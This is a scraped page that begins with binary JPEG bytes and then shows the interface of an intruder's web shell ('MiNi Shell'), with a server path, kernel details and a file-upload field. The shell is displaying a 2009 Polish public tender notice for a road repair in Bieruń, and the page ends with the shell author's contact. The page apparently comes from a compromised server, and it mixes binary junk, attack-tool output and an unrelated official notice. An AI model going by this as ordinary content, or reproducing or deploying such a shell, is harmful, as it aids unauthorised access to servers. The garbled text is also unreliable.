JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090702/220192-N-2009.html

<p class="kh_header"><b>Bieruń: Remont drogi wewnętrznej na osiedlu przy ul. Chemików w Bieruniu</b><br>
<b>Numer ogłoszenia: 220192 - 2009; data zamieszczenia: 02.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 032 3242439, faks (032) 2164035; 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont drogi wewnętrznej na osiedlu przy ul. Chemików w Bieruniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest :
Remont  drogi  wewnętrznej na osiedlu przy ul. Chemików   w Bieruniu , pomiędzy budynkami   nr 55  i   109 , który obejmuje :
- roboty rozbiórkowe  ; krawężników na ławie - 107 mb, obrzeży betonowych - 58 mb,
  nawierzchni z betonu - 187,60 m2, chodników z  płytek betonowych - 63 m2;
- roboty ziemne - korytowanie 258,6 m2, wykopy liniowe - 16,2 m3, zasypywanie - 13,5 m3;
- zabudowa 2 studzienek ściekowych ulicznych z przykanalikami dł.  8 mb;
- wykonanie warstwy odsączającej , dolnej i górnej warstwy podbudowy z tłucznia - 258,6 m2;
- zabudowa krawężników na ławie betonowej - 161,2 mb
- wykonanie nawierzchni z kostki betonowej - 258,6 m2
- wykonanie nakładki z betonu asfaltowego na istniejącym parkingu - 91 m2
- wycinka  5 sztuk topól wraz z wywozem dłużyc, karpiny i gałęzi;
- uporządkowanie terenu.
2.	Zakres robót został określony  w  przedmiarze robót i specyfikacji technicznej.  
          Zastosowane materiały i wyroby muszą posiadać odpowiednie dokumenty dopuszczające do 
          stosowania w budownictwie, zgodnie z obowiązującym w tym  zakresie prawem.                  
3.	Zamawiający zastrzega , że żadna część zamówienia nie może być powierzona podwykonawcom.
4.	Powyższe roboty objęte są podatkiem VAT w wysokości 22% 
    
5.        Zamawiający nie przewiduje : aukcji elektronicznej, zawarcia umowy ramowej, dynamicznego 
systemu zakupów, zamówień uzupełniających w rozumieniu ustawy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.51-8, 45.23.32.23-8, 45.23.32.52-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie stosuje się<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy :
 1)  spełniają wszystkie wymagania wynikające z  oświadczeń, których listę przedstawiono w punkcie 
      Wymagane oświadczenia oraz inne wymagania formalne określone  SIWZ i ustawą;
2)	dysponują osobą  z uprawnieniami budowlanymi w zakresie kierowania robotami drogowymi;
3)	wykonali z należytą starannością w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia , a  jeżeli okres prowadzenia działalności jest krótszy to w tym okresie , roboty związane   z  budową lub remontem  dróg, chodników, placów o  łącznej wartości brutto co najmniej  300 000,00  zł.
Przy ocenie spełnienia warunku zamawiający będzie brał pod uwagę tylko te zadania , których odbiór dokonany został w okresie j.w. i należyta staranność ich wykonania zostanie potwierdzona dokumentami  (np. kserokopiami protokołów odbioru końcowego, referencjami).                          
4)	udzielą pisemnej gwarancji na wykonane roboty na okres nie krótszy niż 24 miesiące , licząc od  
      daty podpisania protokołu odbioru robót.
Ocena spełnienia warunków uczestnictwa w postępowaniu będzie dokonana wg zasady:  spełnia/ nie spełnia, na podstawie przedłożonych w ofercie dokumentów i oświadczeń w związku z  wymagania-mi określonymi w SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Każdy wykonawca przystępujący do postępowania złoży następujące oświadczenia :
1.	Oświadczenie  z  art. 22  ust. 1 ustawy, że :
1)	posiada uprawnienia do wykonywania określonej działalności lub czynności , jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym 
       i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych 
       podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania 
       zamówienia;
3)	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlega wykluczeniu z  postępowania na podstawie art. 24 ustawy,
       2.    Oświadczenie , że po zapoznaniu się z  SIWZ - akceptuje je bez zastrzeżeń.
3.	Oświadczenie , że będzie związany przedmiotową ofertą przez okres 30 dni od daty upływu   terminu składania ofert , a w przypadku wygrania przetargu zawrze umowę wg wzoru  dołączonego do SIWZ w ciągu 14 dni od daty otrzymania informacji o wyborze oferty.
4.  Oferta jest jawna w całości  części. Strony oferty od -do  stanowią tajemnicę   
      przedsiębiorstwa w rozumieniu przepisu o zwalczaniu nieuczciwej konkurencji i nie mogą być  
       ujawnione innym uczestnikom postępowania.
5.   Oświadczenie podmiotów występujących   wspólnie ( w przypadku  ich uczestnictwa).      
6.	Oświadczenie o ujęciu w kosztach ogólnych kosztów nie wynikających z przedmiaru robót m.in.  
projektu organizacji i właściwego oznakowania robót prowadzonych w obrębie pasa drogowego,
składowania materiałów z rozbiórki  i nadmiaru ziemi oraz przywrócenia  terenu przyległego do  remontowanej drogi  do stanu pierwotnego.
7.	Oświadczenie, że przedmiot zamówienia wykonany będzie siłami własnymi wykonawcy bez 
     zatrudniania podwykonawców.
8.	Oświadczenie o udzielonej gwarancji na cały przedmiot zamówienia.
Wzory oświadczeń 1 - 6  dołączone są do SIWZ. Oświadczenia   7 i 8 znajdują się na wzorze formularza oferty.
Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnioną (uprawnione) do zaciągania zobowiązań w imieniu Wykonawcy, zgodnie                   z załączonym do oferty aktualnym wpisem do właściwych rejestrów (KRS) czy ewidencji działalności gospodarczej ,  pełnomocnictwami. Pełnomocnictwa należy załączyć do oferty         w formie oryginału lub notarialnie poświadczonej kopii.


Od wykonawców ubiegających się o przyznanie zamówienia wymagane jest,  w celu potwierdzenia spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy, przedstawienie wymienionych niżej dokumentów. Dokumenty te, zgodnie z obowiązującym w tym zakresie Rozporządzeniem Prezesa Rady Ministrów  z dnia 19 maja 2006 roku  (Dz. U. Nr 87-2006 poz. 605  z póxn.zm.) mogą być przedstawione w formie oryginału albo  kserokopii  poświadczonych za zgodność z oryginałem (zaleca się potwierdzenie każdej zapisanej strony dokumentu) przez wykonawcę tzn. osobę (osoby) uprawnioną(e)  do podpisania oferty:
1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej , wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert .  
2.	Wykaz wykonanych z należytą starannością w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia ,a jeżeli okres prowadzonej działalności jest krótszy to w tym okresie , robót  związanych  z  budową lub remontem dróg, chodników, placów o łącznej wartości brutto co najmniej 300 000,00  zł.                          
Wykaz należy sporządzić wg wzoru tabeli stanowiącej  załącznik do SIWZ.
3.	Dokumenty (np. referencje, protokoły odbioru) potwierdzające należytą staranność wykonania robót  wymienionych w wykazie, koniecznych dla spełnienia warunku z pkt IV.3. SIWZ.
4.	Uprawnienia  budowlane osób, które będą kierowały robotami drogowymi oraz aktualne zaświadczenia o przynależności do Okręgowej Izby Inżynierów Budownictwa  lub dowód wpłaty składek członkowskich ( w przypadku braku oznaczenia ważności na zaświadczeniach).
Uwaga : 
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w  punktach Listy wymaganych dokumentów, przedstawia odpowiednio :
1)	Dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio , że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument , o którym mowa powyżej, powinien  być wystawiony nie wcześniej ni 6 miesięcy przed upływem terminu składania ofert. 
2)	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce 
      zamieszkania, nie wydaje się dokumentów o których mowa powyżej (w pkt VI), zastępuje się je 
      dokumentami zawierającymi oświadczenie złożone przed : notariuszem, właściwym organem 
      sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego, 
      odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce 
      zamieszkania. Termin ważności oświadczeń  jest taki sam , jak dotyczący dokumentu , o którym 
      mowa w punkcie 1 niniejszej uwagi..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Bieruń, Rynek 14 (Referat Zamówień Publicznych).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2009 godzina 12:00, miejsce: Urząd Miejski Bieruń, Rynek 14 (Kancelaria parter).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com